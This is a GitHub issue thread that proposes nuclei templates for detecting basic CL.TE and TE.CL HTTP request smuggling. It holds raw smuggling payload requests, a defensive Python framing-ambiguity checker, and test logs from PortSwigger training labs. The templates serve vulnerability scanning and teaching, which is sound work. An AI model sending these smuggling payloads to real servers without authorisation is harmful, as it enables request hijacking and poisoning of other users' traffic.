projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

Basic CL.TE & TE.CL HTTP request smuggling vulnerabilities #4087

Open akincibor opened 2 years ago

akincibor commented 2 years ago

CL.TE:

id: CL-TE-http-smuggling

info:
  name: HTTP request smuggling, basic CL.TE vulnerability
  author: pdteam, akincibor
  severity: Low

# The request is sent twice. A front end that frames by Content-Length sees a
# 6-byte body ("0\r\n\r\nG") and forwards it whole; a back end that frames by
# Transfer-Encoding stops after the empty chunk and keeps the left-over "G" as
# the start of the next request, so the repeat arrives as "GPOST".
requests:
  - raw:
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G

    # unsafe switches nuclei to its raw HTTP client so the conflicting
    # Content-Length and chunked body are sent exactly as written.
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          # Error text the PortSwigger lab back end returns for the smuggled method.
          - 'contains(body, "Unrecognized method GPOST")'

TE.CL:

id: TE-CL-http-smuggling

info:
  name: HTTP request smuggling, basic TE.CL vulnerability
  author: pdteam, akincibor
  severity: Low

# Mirror image of the CL.TE case. A front end that frames by Transfer-Encoding
# forwards the whole 0x5c-byte chunk ("GPOST ..." through "x=1") plus the
# terminating "0" chunk; a back end that honours Content-length: 4 reads only
# "5c\r\n" and treats "GPOST / HTTP/1.1 ..." as the start of the next request.
# Both copies end with the empty line that terminates the chunked body.
requests:
  - raw:
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded
      Content-length: 4
      Transfer-Encoding: chunked

      5c
      GPOST / HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 15

      x=1
      0

    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded
      Content-length: 4
      Transfer-Encoding: chunked

      5c
      GPOST / HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 15

      x=1
      0

    # unsafe switches nuclei to its raw HTTP client so the conflicting
    # Content-length and chunked body are sent exactly as written.
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          # Error text the PortSwigger lab back end returns for the smuggled method.
          - 'contains(body, "Unrecognized method GPOST")'
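A defender-side check for the framing ambiguity both templates rely on, added here as an example (not a nuclei template or project code): it frames the same raw bytes the way a Content-Length-only parser and a chunked-only parser would and reports whether they disagree, using payloads constructed from the two templates above with a placeholder host.

```python
"""Framing-ambiguity check for raw HTTP/1.1 requests (added example, not a
nuclei template): frame the same bytes as a Content-Length-only parser and a
chunked-only parser would, and report whether the two framings disagree."""

def split_request(raw: bytes):
    """Return (request line, lower-cased header map, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def te_leftover(body: bytes) -> bytes:
    """Bytes left on the connection once a chunked parser has finished."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            while body[pos:pos + 2] != b"\r\n":  # skip any trailer fields
                pos = body.index(b"\r\n", pos) + 2
            return body[pos + 2:]
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += size + 2

def analyse(raw: bytes) -> dict:
    """Flag CL+TE requests (RFC 7230 3.3.3: treat as an error, TE overrides CL)
    and show what each framing leaves unread; that leftover is the desync prefix."""
    _, headers, body = split_request(raw)
    out = {"ambiguous": b"content-length" in headers and b"transfer-encoding" in headers}
    if b"content-length" in headers:
        out["cl_leftover"] = body[int(headers[b"content-length"]):]
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        out["te_leftover"] = te_leftover(body)
    return out

# Constructed payloads mirroring the two templates above (CRLF line ends,
# placeholder host); the 0x5c chunk spans "GPOST ..." up to and including "x=1".
HDR = b"Host: target.invalid\r\nContent-Type: application/x-www-form-urlencoded\r\n"
CL_TE = (b"POST / HTTP/1.1\r\n" + HDR + b"Content-Length: 6\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nG")
TE_CL = (b"POST / HTTP/1.1\r\n" + HDR + b"Content-length: 4\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n5c\r\nGPOST / HTTP/1.1\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n")
```

A proxy that runs this check on ingress and rejects any request where `ambiguous` is true removes the precondition for both desync variants, whichever framing its back end prefers.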

alexanderkent commented 2 years ago

Thanks for sharing. Quickly tested this against the HTTP request smuggling lab by PortSwigger and they work if run standalone, e.g.

nuclei -u https://XXXXXXXXX.web-security-academy.net -t nuclei-templates/CL-TE-http-smuggling.yaml

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.5 (latest)
[INF] Using Nuclei Templates 9.1.5 (latest)
[INF] Templates added in last update: 58
[INF] Templates loaded for scan: 1
[2022-08-13 08:01:12] [CL-TE-http-smuggling] [http] [low] https://XXXXXXXXX.web-security-

And the TE-CL one against the same target (as expected)

nuclei -u https://XXXXXXXXX.web-security-academy.net -t nuclei-templates/TE-CL-http-smuggling.yaml

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.5 (latest)
[INF] Using Nuclei Templates 9.1.5 (latest)
[INF] Templates added in last update: 58
[INF] Templates loaded for scan: 1
[INF] No results found. Better luck next time!

But trying both e.g. 2 templates:

nuclei -u https://XXXXXXXXX.web-security-academy.net -t nuclei-templates/

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.5 (latest)
[INF] Using Nuclei Templates 9.1.5 (latest)
[INF] Templates added in last update: 58
[INF] Templates loaded for scan: 2
[INF] No results found. Better luck next time!

Yields no results. I tried -c 1 concurrency etc., but it always yields no results when more than one template is loaded.

ehsandeep commented 2 years ago

The behavior @alexanderkent mentioned should be fixed with the latest release: https://github.com/projectdiscovery/nuclei/releases/tag/v2.7.6